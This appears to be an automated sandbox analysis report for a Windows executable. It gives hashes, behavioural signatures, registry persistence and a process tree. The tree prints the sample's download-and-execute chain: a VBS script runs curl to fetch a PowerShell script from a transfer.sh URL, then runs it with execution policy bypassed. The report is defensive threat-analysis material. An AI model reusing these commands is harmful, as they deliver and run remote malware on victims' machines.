Analysis
-
max time kernel
50s -
max time network
47s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
17/01/2023, 12:09
Static task
static1
Behavioral task
behavioral1
Sample
3459ebc48502fb42337647d456681337d303e50a99ca536e010d7cf1ebf6f0f5.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
3459ebc48502fb42337647d456681337d303e50a99ca536e010d7cf1ebf6f0f5.exe
Resource
win10v2004-20220901-en
General
-
Target
3459ebc48502fb42337647d456681337d303e50a99ca536e010d7cf1ebf6f0f5.exe
-
Size
547KB
-
MD5
b0ab211e83a23d58e1322e4d2d6f0a96
-
SHA1
d568fbcd41e30651cc80ba8a5e9eeab637a99f9e
-
SHA256
3459ebc48502fb42337647d456681337d303e50a99ca536e010d7cf1ebf6f0f5
-
SHA512
4a54251fbf23fe3d0e96fcf8d3363e917921644a178387b619367338faa1884134639dd696d55a5a9f06cf167f128d599cc57fb62dba603afc4ebb287d22204d
-
SSDEEP
3072:SvGyYiSDnt1G5GWp1icKAArDZz4N9GhbkrNEk184:W4wp0yN90QEg
Malware Config
Signatures
-
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" 3459ebc48502fb42337647d456681337d303e50a99ca536e010d7cf1ebf6f0f5.exe Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce 3459ebc48502fb42337647d456681337d303e50a99ca536e010d7cf1ebf6f0f5.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1480 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1480 powershell.exe -
Suspicious use of WriteProcessMemory 21 IoCs
description pid Process procid_target PID 1664 wrote to memory of 1628 1664 3459ebc48502fb42337647d456681337d303e50a99ca536e010d7cf1ebf6f0f5.exe 27 PID 1664 wrote to memory of 1628 1664 3459ebc48502fb42337647d456681337d303e50a99ca536e010d7cf1ebf6f0f5.exe 27 PID 1664 wrote to memory of 1628 1664 3459ebc48502fb42337647d456681337d303e50a99ca536e010d7cf1ebf6f0f5.exe 27 PID 1628 wrote to memory of 1824 1628 cmd.exe 29 PID 1628 wrote to memory of 1824 1628 cmd.exe 29 PID 1628 wrote to memory of 1824 1628 cmd.exe 29 PID 1824 wrote to memory of 932 1824 WScript.exe 30 PID 1824 wrote to memory of 932 1824 WScript.exe 30 PID 1824 wrote to memory of 932 1824 WScript.exe 30 PID 932 wrote to memory of 376 932 cmd.exe 32 PID 932 wrote to memory of 376 932 cmd.exe 32 PID 932 wrote to memory of 376 932 cmd.exe 32 PID 1824 wrote to memory of 552 1824 WScript.exe 33 PID 1824 wrote to memory of 552 1824 WScript.exe 33 PID 1824 wrote to memory of 552 1824 WScript.exe 33 PID 552 wrote to memory of 548 552 cmd.exe 35 PID 552 wrote to memory of 548 552 cmd.exe 35 PID 552 wrote to memory of 548 552 cmd.exe 35 PID 548 wrote to memory of 1480 548 cmd.exe 36 PID 548 wrote to memory of 1480 548 cmd.exe 36 PID 548 wrote to memory of 1480 548 cmd.exe 36
Processes
-
C:\Users\Admin\AppData\Local\Temp\3459ebc48502fb42337647d456681337d303e50a99ca536e010d7cf1ebf6f0f5.exe"C:\Users\Admin\AppData\Local\Temp\3459ebc48502fb42337647d456681337d303e50a99ca536e010d7cf1ebf6f0f5.exe"1⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:1664 -
C:\Windows\system32\cmd.execmd /c new.vbs2⤵
- Suspicious use of WriteProcessMemory
PID:1628 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\new.vbs"3⤵
- Suspicious use of WriteProcessMemory
PID:1824 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd.exe /c curl https://transfer.sh/get/MHXbtP/ss.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps14⤵
- Suspicious use of WriteProcessMemory
PID:932 -
C:\Windows\system32\cmd.execmd.exe /c curl https://transfer.sh/get/MHXbtP/ss.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps15⤵PID:376
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd.exe /c powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps14⤵
- Suspicious use of WriteProcessMemory
PID:552 -
C:\Windows\system32\cmd.execmd.exe /c powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps15⤵
- Suspicious use of WriteProcessMemory
PID:548 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps16⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1480
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
300.0MB
MD5f7e7099eea0cc25fc49d04cd53c573a1
SHA13abac9f3f93b0f87ef432d70c40e8ab865157770
SHA256b7f331e83a80b15cc4537324bde827ac9b2ecb990150db4d00d84ee2560cf5be
SHA512c19ddc5e41ed6d485f5df47996f34ff326a782e909bffaa8aa31a3f72fddb33cc7e3709e0cc44b2078668dc83297b42bb3157d6d000a9323ffca6303cd43f074